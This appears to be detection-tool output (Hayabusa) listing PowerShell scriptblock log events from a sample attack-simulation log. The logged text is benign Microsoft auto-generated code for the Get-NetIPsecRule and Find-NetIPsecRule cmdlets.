($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Binding",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"s = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' -Alias '*' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSet",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"s = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' -Alias '*' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSet",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Name='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 